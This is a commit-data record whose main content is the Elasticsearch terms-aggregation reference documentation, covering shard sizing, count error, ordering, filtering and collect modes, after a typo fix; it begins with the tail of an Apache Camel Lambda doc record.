pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3b2556db3d37b81f974c17249be533f6f20a032","subject":"fix no=>not typo (#32463)","message":"fix no=>not typo (#32463)\n\nFound a tiny typo while reading the docs","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/aggregations\/bucket\/terms-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/terms-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPUT \/products\n{\n \"mappings\": {\n \"product\": {\n \"properties\": {\n \"genre\": {\n \"type\": \"keyword\"\n },\n \"product\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPOST \/products\/product\/_bulk?refresh\n{\"index\":{\"_id\":0}}\n{\"genre\": \"rock\", \"product\": \"Product A\"}\n{\"index\":{\"_id\":1}}\n{\"genre\": \"rock\"}\n{\"index\":{\"_id\":2}}\n{\"genre\": \"rock\"}\n{\"index\":{\"_id\":3}}\n{\"genre\": \"jazz\", \"product\": \"Product Z\"}\n{\"index\":{\"_id\":4}}\n{\"genre\": \"jazz\"}\n{\"index\":{\"_id\":5}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":6}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":7}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":8}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":9}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":10}}\n{\"genre\": \"electronic\"}\n\n-------------------------------------------------\n\/\/ NOTCONSOLE\n\/\/ TESTSETUP\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : { \"field\" : \"genre\" }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"genres\" : {\n \"doc_count_error_upper_bound\": 0, <1>\n \"sum_other_doc_count\": 0, <2>\n \"buckets\" : [ <3>\n {\n \"key\" : \"electronic\",\n \"doc_count\" : 6\n },\n {\n \"key\" : \"rock\",\n \"doc_count\" : 3\n },\n {\n \"key\" : \"jazz\",\n \"doc_count\" : 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n<1> an upper bound of the error on the document counts for each term, see <<search-aggregations-bucket-terms-aggregation-approximate-counts,below>>\n<2> when there are lots of unique terms, Elasticsearch only returns the top terms; this number is the sum of the document counts for all buckets that are not part of the response\n<3> the list of the top buckets, the meaning of `top` being defined by the <<search-aggregations-bucket-terms-aggregation-order,order>>\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n[[search-aggregations-bucket-terms-aggregation-size]]\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nNOTE: If you want to retrieve **all** terms or all combinations of terms in a nested `terms` aggregation\n you should use the <<search-aggregations-bucket-composite-aggregation,Composite>> aggregation which\n allows to paginate over all possible terms rather than setting a size greater than the cardinality of the field in the\n `terms` aggregation. The `terms` aggregation is meant to return the `top` terms and does not allow pagination.\n\n[[search-aggregations-bucket-terms-aggregation-approximate-counts]]\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will\n override it and reset it to be equal to `size`.\n\n\nThe default `shard_size` will be `size` if the search request needs to go to a single shard, and `(size * 1.5 + 10)`\notherwise.\n\n==== Calculating Document Count Error\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard. For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\n==== Per bucket document count error\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5,\n \"show_term_doc_count_error\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\n\nThis shows an error value for each term returned by the aggregation which represents the 'worst case' error in the document count\nand can be useful when deciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for\nthe last term returned by all shards which did not return the term. In the example above the error in the document count for Product C\nwould be 15 as Shard B was the only shard not to return the term and the document count of the last term it did return was 15.\nThe actual document count of Product C was 54 so the document count was only actually off by 4 even though the worst case was that\nit would be off by 15. Product A, however has an error of 0 for its document count, since every shard returned it we can be confident\nthat the count returned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n[[search-aggregations-bucket-terms-aggregation-order]]\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is possible to change this behaviour as documented below:\n\nWARNING: Sorting by ascending `_count` or by sub aggregation is discouraged as it increases the\n<<search-aggregations-bucket-terms-aggregation-approximate-counts,error>> on document counts.\nIt is fine when a single shard is queried, or when the field that is being aggregated was used\nas a routing key at index time: in these cases results will be accurate since shards have disjoint\nvalues. However otherwise, errors are unbounded. One particular case that could still be useful\nis sorting by <<search-aggregations-metrics-min-aggregation,`min`>> or\n<<search-aggregations-metrics-max-aggregation,`max`>> aggregation: counts will not be accurate\nbut at least the top buckets will be correctly picked.\n\nOrdering the buckets by their doc `_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_key\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\ndeprecated[6.0.0, Use `_key` instead of `_term` to order buckets by their term]\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"max_play_count\" : \"desc\" }\n },\n \"aggs\" : {\n \"max_play_count\" : { \"max\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"playback_stats.max\" : \"desc\" }\n },\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[NOTE]\n.Pipeline aggs cannot be used for sorting\n=======================================\n\n<<search-aggregations-pipeline,Pipeline aggregations>> are run during the\nreduce phase after all other aggregations have already completed. For this\nreason, they cannot be used for ordering.\n\n=======================================\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations path are of a single-bucket type, where the last aggregation in the path may either be a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n\/\/ https:\/\/en.wikipedia.org\/wiki\/Extended_Backus%E2%80%93Naur_Form\n[source,ebnf]\n--------------------------------------------------\nAGG_SEPARATOR = '>' ;\nMETRIC_SEPARATOR = '.' ;\nAGG_NAME = <the name of the aggregation> ;\nMETRIC = <the name of the metric (in case of multi-value metrics aggregation)> ;\nPATH = <AGG_NAME> [ <AGG_SEPARATOR>, <AGG_NAME> ]* [ <METRIC_SEPARATOR>, <METRIC> ] ;\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : { \"rock>playback_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artist's countries buckets based on the average play count among the rock songs.\n\nMultiple criteria can be used to order the buckets by providing an array of order criteria such as the following:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : [ { \"rock>playback_stats.avg\" : \"desc\" }, { \"_count\" : \"desc\" } ]\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artist's countries buckets based on the average play count among the rock songs and then by\ntheir `doc_count` in descending order.\n\nNOTE: In the event that two buckets share the same values for all order criteria the bucket's term value is used as a\ntie-breaker in ascending alphabetical order to prevent non-deterministic ordering of buckets.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\n`shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents or documents\n from other types, so there is no warranty that a `match_all` query would find a positive document count for\n those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"source\": \"doc['genre'].value\",\n \"lang\": \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis will interpret the `script` parameter as an `inline` script with the default script language and no script parameters. To use a stored script use the following syntax:\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPOST \/_scripts\/my_script\n{\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc[params.field].value\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"id\": \"my_script\",\n \"params\": {\n \"field\": \"genre\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n==== Value Script\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : {\n \"source\" : \"'Genre: ' +_value\",\n \"lang\" : \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expression strings or arrays of exact values. Additionally,\n`include` clauses can filter using `partition` expressions.\n\n===== Filtering Values with regular expressions\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will not be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`.\n\nThe syntax is the same as <<regexp-syntax,regexp queries>>.\n\n===== Filtering Values with exact values\n\nFor matching based on exact values the `include` and `exclude` parameters can simply take an array of\nstrings that represent the terms as they are found in the index:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"JapaneseCars\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"include\" : [\"mazda\", \"honda\"]\n }\n },\n \"ActiveCarManufacturers\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"exclude\" : [\"rover\", \"jensen\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n===== Filtering Values with partitions\n\nSometimes there are too many unique terms to process in a single request\/response pair so \nit can be useful to break the analysis up into multiple requests.\nThis can be achieved by grouping the field's values into a number of partitions at query-time and processing\nonly one partition in each request.\nConsider this request which is looking for accounts that have not logged any access recently:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"size\": 0,\n \"aggs\": {\n \"expired_sessions\": {\n \"terms\": {\n \"field\": \"account_id\",\n \"include\": {\n \"partition\": 0,\n \"num_partitions\": 20\n },\n \"size\": 10000,\n \"order\": {\n \"last_access\": \"asc\"\n }\n },\n \"aggs\": {\n \"last_access\": {\n \"max\": {\n \"field\": \"access_date\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis request is finding the last logged access date for a subset of customer accounts because we\nmight want to expire some customer accounts who haven't been seen for a long while.\nThe `num_partitions` setting has requested that the unique account_ids are organized evenly into twenty\npartitions (0 to 19). and the `partition` setting in this request filters to only consider account_ids falling \ninto partition 0. Subsequent requests should ask for partitions 1 then 2 etc to complete the expired-account analysis.\n\nNote that the `size` setting for the number of results returned needs to be tuned with the `num_partitions`. \nFor this particular account-expiration example the process for balancing values for `size` and `num_partitions` would be as follows:\n\n1. Use the `cardinality` aggregation to estimate the total number of unique account_id values\n2. Pick a value for `num_partitions` to break the number from 1) up into more manageable chunks\n3. Pick a `size` value for the number of responses we want from each partition\n4. Run a test request\n\nIf we have a circuit-breaker error we are trying to do too much in one request and must increase `num_partitions`.\nIf the request was successful but the last account ID in the date-sorted test response was still an account we might want to \nexpire then we may be missing accounts of interest and have set our numbers too low. We must either \n\n* increase the `size` parameter to return more results per partition (could be heavy on memory) or\n* increase the `num_partitions` to consider less accounts per request (could increase overall processing time as we need to make more requests)\n\nUltimately this is a balancing act between managing the Elasticsearch resources required to process a single request and the volume\nof requests that the client application must issue to complete a task.\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nDeferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs.\nIn some scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nEven though the number of actors may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets\nduring calculation - a single actor can produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the `depth_first` mode.\n\nNOTE: The `breadth_first` is the default mode for fields with a cardinality bigger than the requested size or when the cardinality is unknown (numeric fields or scripts for instance).\nIt is possible to override the default heuristic and to provide a collect mode directly in the request:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\" <1>\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> the possible values are `breadth_first` and `depth_first`\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets are\ncached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: Nested aggregations such as `top_hits` which require access to score information under an aggregation that uses the `breadth_first`\ncollection mode need to replay the query on the second pass but only for the documents belonging to the top buckets.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using global ordinals of the field and allocating one bucket per global ordinal (`global_ordinals`)\n\nElasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured.\n\n`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically\nso memory usage is linear to the number of values of the documents that are part of the aggregation scope.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode\nis significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> The possible values are `map`, `global_ordinals`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n\n==== Missing value\n\nThe `missing` parameter defines how documents that are missing a value should be treated.\nBy default they will be ignored but it is also possible to treat them as if they\nhad a value.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"missing\": \"N\/A\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N\/A`.\n\n==== Mixing field types\n\nWARNING: When aggregating on multiple indices the type of the aggregated field may not be the same in all indices.\nSome types are compatible with each other (`integer` and `long` or `float` and `double`) but when the types are a mix\nof decimal and non-decimal number the terms aggregation will promote the non-decimal numbers to decimal numbers.\nThis can result in a loss of precision in the bucket values.\n","old_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPUT \/products\n{\n \"mappings\": {\n \"product\": {\n \"properties\": {\n \"genre\": {\n \"type\": \"keyword\"\n },\n \"product\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPOST \/products\/product\/_bulk?refresh\n{\"index\":{\"_id\":0}}\n{\"genre\": \"rock\", \"product\": \"Product A\"}\n{\"index\":{\"_id\":1}}\n{\"genre\": \"rock\"}\n{\"index\":{\"_id\":2}}\n{\"genre\": \"rock\"}\n{\"index\":{\"_id\":3}}\n{\"genre\": \"jazz\", \"product\": \"Product Z\"}\n{\"index\":{\"_id\":4}}\n{\"genre\": \"jazz\"}\n{\"index\":{\"_id\":5}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":6}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":7}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":8}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":9}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":10}}\n{\"genre\": \"electronic\"}\n\n-------------------------------------------------\n\/\/ NOTCONSOLE\n\/\/ TESTSETUP\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : { \"field\" : \"genre\" }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"genres\" : {\n \"doc_count_error_upper_bound\": 0, <1>\n \"sum_other_doc_count\": 0, <2>\n \"buckets\" : [ <3>\n {\n \"key\" : \"electronic\",\n \"doc_count\" : 6\n },\n {\n \"key\" : \"rock\",\n \"doc_count\" : 3\n },\n {\n \"key\" : \"jazz\",\n \"doc_count\" : 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ 